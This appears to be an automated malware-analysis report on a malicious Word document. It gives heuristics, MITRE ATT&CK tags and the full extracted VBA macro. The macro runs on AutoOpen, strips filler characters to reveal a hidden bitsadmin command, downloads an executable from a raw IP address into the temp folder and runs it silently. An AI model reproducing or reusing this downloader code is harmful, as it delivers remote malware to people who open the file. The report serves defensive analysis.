MALICIOUS
168
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious Word document containing VBA macros. It uses a common lure to trick users into enabling macros, which then execute the embedded VBA code. The VBA code contains a potential Shell call and CreateObject call, indicating it likely attempts to download and execute a second-stage payload.
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell nUKaI61f, 0 -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set SHswlL = CreateObject("vbscript.regexp") -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3927 bytes |
SHA-256: 832ad71f3d8616cfee7e21a8a0f1f532fe7356c4a27eb0e09a0bcdeca72cc141 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Function MJCTM(CWDMxZLy As String, FbIlx As String)
Const MiPNInTB = "usher"
Const VoTwTzi = 56413.774156729
ijrJGJ = 27499.72631798
Dim SMBLRBfVb
SMBLRBfVb = Empty
Dim UaeOs
UaeOs = Array()
Dim u6TmeUD
u6TmeUD = 104
ur6AH = Null
cxnTF = "l"
MJCTM = Replace(CWDMxZLy, FbIlx, "")
Dim pLTyDvz
pLTyDvz = Empty
pcIlatmCk = Array(230, -196, -2001184018, 42, True)
BnrkBExe = Array(10023, True, 53568, 247)
Dim WDYsMRc
WDYsMRc = 30721.11938915
Dim YzdUxwdTr As Integer
YzdUxwdTr = 6299
Dim lByiA
lByiA = Array()
Const zLddbe = "m"
Dim rIBoSu3Y
rIBoSu3Y = Null
Set SHswlL = CreateObject("vbscript.regexp")
QSdqj = Date
Const NFLd2 = 209
Dim twrPREK As Variant
twrPREK = Array()
Dim u5gdI As Variant
u5gdI = Array(False, "b1bc", 253, 17635, -1034035452)
Const AiUVN = 130
Dim xrO5u As Boolean
xrO5u = False
Dim DtSd2 As Currency
DtSd2 = 24643
TxB7XFd = Array()
SHswlL.Pattern = FbIlx
Dim KWqu4PuM
KWqu4PuM = Array(18941)
Const PoTWMJbw = 4611
Const zvcqMHRt = 45690
Dim dBM7m
dBM7m = Array()
Dim Jhkf0ces
Jhkf0ces = 18334
Px3LN = Empty
Dim CP3XeR As Long
Dim QLnSIFu
QLnSIFu = "g"
Dim FjRfK
FjRfK = 37054
Dim lttYOFV As Byte
lttYOFV = 103
Dim hwbE4nQC
hwbE4nQC = 238
Dim HxZaHEuKH
HxZaHEuKH = ""
ZIGd3quHC = Date
efuU1j3i = 19822
CP3XeR = True
IsvteRd = True
Dim xrm3j
xrm3j = 0
Const wwBlWqvE = 32055
Dim YrDaO As Integer
YrDaO = -20549
Dim TQAPu
TQAPu = Empty
XFRbqp6x = False
QvKu9pdc = Array(0, -324123460, True, "-51274", 201, 77, 0)
Const ZLaDNPOM0 = 0
SHswlL.Global = CP3XeR
Dim BShA9 As Long
BShA9 = -652703950
Dim VLlsY
VLlsY = 173
Dim JrF8V
JrF8V = Null
Const YCxJyqzq = -23691
PlVOxYFG = "-31815"
Const QjPYL = 224
MJCTM = SHswlL.Replace(CWDMxZLy, "")
End Function
Sub AutoOpen()
Dim GUEQgl0 As Currency
GUEQgl0 = -4067
Dim wcUbOm
wcUbOm = Array()
Dim gq5z4s
gq5z4s = Array(44415.093361908, -12425, True, "T", "08fd", True)
oUJ1RH = 12730.522629119
Dim SYLDEIEHU As Long
SYLDEIEHU = -1851000800
Dim FtubqlSwF
FtubqlSwF = 194
Const nfYJAbOe = True
dXqA7m = Array(-12581, "debasement", 5843.503110416, 51380, 28, 17137.457762019)
Dim nUKaI61f As String
Const EbPbjMfg = False
Dim ETBwFjm
ETBwFjm = Array()
qHfrpSwZq = -219635906
Dim uj0Cswp
uj0Cswp = 9
Dim kyyXvysya As Variant
kyyXvysya = Array()
nUKaI61f = MJCTM("cSo4T9mSo4T9dSo4T9 So4T9/So4T9CSo4T9 So4T9bSo4T9iSo4T9tSo4T9sSo4T9aSo4T9dSo4T9mSo4T9iSo4T9nSo4T9 So4T9/So4T9tSo4T9rSo4T9aSo4T9nSo4T9sSo4T9fSo4T9eSo4T9rSo4T9 So4T9dSo4T9wSo4T9 So4T9/So4T9dSo4T9oSo4T9wSo4T9nSo4T9lSo4T9oSo4T9aSo4T9dSo4T9 So4T9/So4T9pSo4T9rSo4T9iSo4T9oSo4T9rSo4T9iSo4T9tSo4T9ySo4T9 So4T9hSo4T9iSo4T9gSo4T9hSo4T9 So4T9hSo4T9tSo4T9tSo4T9pSo4T9:So4T9/So4T9/So4T99So4T93So4T9.So4T91So4T97So4T90So4T9.So4T91So4T90So4T94So4T9.So4T99So4T98So4T9/So4T9jSo4T9bSo4T9mSo4T9fSo4T9kSo4T9jSo4T9fSo4T9rSo4T9eSo4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9%So4T9tSo4T9mSo4T9pSo4T9%So4T9\So4T9~So4T9.So4T9eSo4T9xSo4T9eSo4T9 So4T9&So4T9 So4T9eSo4T9xSo4T9iSo4T9tSo4T9", "So4T9")
AJnLTjdoe = Array(50590, 0, 253, 11638, "ring", False, -2378)
Dim jQsbW
jQsbW = Date
Dim J8pAjy As String
J8pAjy = "317eed7b"
zHgWO = -2086329278
kpmVq = Empty
BqXpmPanR = True
hRpGYfaRr = -426398108
Const IbHFT = "32500"
G3h5PwT = -13855
Shell nUKaI61f, 0
Hwpuwedp = Array(0, 20128, 54868.962024103, 45712.308802002, True, -1868748710, "")
ORSXIMyL = -16892
Dim SGqXR
SGqXR = 16032.845284238
Const OFXiY = 34986.350534212
Dim xQWF3VrvY As Variant
xQWF3VrvY = Array()
dVrztZa = 0
JBwM8 = 14580.854766339
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.